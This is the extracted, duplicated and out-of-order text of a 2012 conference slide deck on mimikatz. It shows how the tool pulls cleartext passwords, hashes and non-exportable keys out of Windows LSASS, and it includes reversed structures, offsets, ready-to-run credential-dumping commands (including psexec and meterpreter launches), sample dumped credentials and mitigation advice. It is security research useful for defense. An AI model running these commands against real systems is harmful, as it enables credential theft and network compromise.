mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keys ndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53 53
mimikatz crypto what we can do
mimikatz crypto what we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basics ndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depth ndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSP bull Their biometrics stuff was a little buggy )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54 54
mimikatz what else can it do
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driver ndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55 55
mimikatz thatrsquos all folks
mimikatz thatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunity bull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challenges bull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56 56
Blog Source Code amp Contact Blog Source Code amp Contact
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
blog httpbloggentilkiwicom mimikatz httpbloggentilkiwicommimikatz source httpscodegooglecompmimikatz email benjamingentilkiwicom
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57 57
mimikatz sekurlsa tspkg workflow
mimikatz sekurlsa tspkg workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
KIWI_TS_PRIMARKIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0 LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64 BYTE unk0[108] elif defined _M_IX86 BYTE unk0[64] endif LUID LocallyUniqueIdentifier PVOID unk1 PVOID unk2 PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIAL
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
mimikatz sekurlsa tspkg demo time
mimikatz sekurlsa tspkg demo time
sekurlsatspkg
sekurlsatspkg
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15 15
mimikatz sekurlsa wdigest mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
because clear text password over httphttps is not cool
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16 16
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17 17
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18 18
mimikatz sekurlsa wdigest theory
mimikatz sekurlsa wdigest theory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
msv1_0 lsasrvLogonSessionList lsasrvLogonSessionListCount
LIST_ENTRY ULONG
Key NT 5 Symbols
RC4 lsasrvg_cbRandomKey lsasrvg_pRandomKey
DESx lsasrvg_pDESXKey lsasrvg_Feedback
Key NT 6 Symbols
lsasrvInitializationVector
3DES lsasrvh3DesKey
AES lsasrvhAesKey
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
Some commands mimikatz privilegedebug sekurlsalogonPasswords full exit
psexec windows -s -c cmimikatzWin32mimikatzexe sekurlsalogonPasswords full exit
meterpreter gt execute -H -c -i -m -f pentestpasswordsmimikatzmimikatz_x86exe
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 36 36
mimikatz 10 x64 (RC) Traitement du Kiwi (Aug 2 2012 013228) httpbloggentilkiwicommimikatz mimikatz privilegedebug Demande dACTIVATION du privilegravege SeDebugPrivilege OK mimikatz sekurlsalogonPasswords full Authentification Id 0234870 Package dauthentification NTLM Utilisateur principal Gentil Kiwi Domaine dauthentification vm-w8-rp-x msv1_0 Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Hash LM d0e9aee149655a6075e4540af1f22d3b Hash NTLM cc36cf7a8514893efccd332446158b1a kerberos Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 wdigest Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 tspkg Utilisateur Gentil Kiwi Domaine vm-w8-rp-x Mot de passe waza1234 livessp nt (LUID KO)
mimikatz sekurlsa what we can do
mimikatz sekurlsa what we can do
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
Basics ndash No physical access to computer (first step to pass the hash then pass the pass) ndash No admin rights system rights debug privileges (hellip) ndash Disable local admin accounts ndash Strong passwords (haha it was a joke so useless ) ndash For privileged account network login instead of interactive (when possible) ndash Audit pass the hash keeps traces and can lock accounts ndash No admin rights system rights debug privileges even VIP ndash Use separated network (or forest) for privileged tasks
More in depth ndash Force strong authentication (SmartCard amp Token) $ euro ndash Short validity for Kerberos tickets ndash No delegation ndash Disable NTLM (available with NT6) ndash No exotic
bull biometrics (it keeps password somewhere and push it to Windows) bull single sign on
ndash Stop shared secrets for authentication push Public Private stuff (like keys )) ndash Let opportunities to stop retro compatibility ndash Disable faulty providers
bull Is it supported by Microsoft bull Even if you can disable LiveSSP TsPkg and WDigest will you disable Kerberos and msv1_0
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 37 37
mimikatz crypto what is it
mimikatz crypto what is it
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
A little module that I wrote to ndash play with Windows Cryptographic API CNG and RSA keys
ndash automate export of certificateskeys bull Even those which are ldquonotrdquo exportable
What crypto module can do ndash List
bull Providers
bull Stores
bull Certificates
bull Keys
ndash Export bull Certificates
ndash public in DER format
ndash with private keys in PFX format
bull Private keys in PVK format ndash itrsquos cool OpenSSL can deal with it too
ndash Patch bull CryptoAPI in mimikatz context
bull CNG in LSASS context (again )
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 38 38
mod_mimikatz_crypto
mimikatz crypto how itrsquos protected
mimikatz crypto how itrsquos protected
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
Private keys are DPAPI protected ndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened) ndash Yes a computerserver open a ldquosessionrdquo
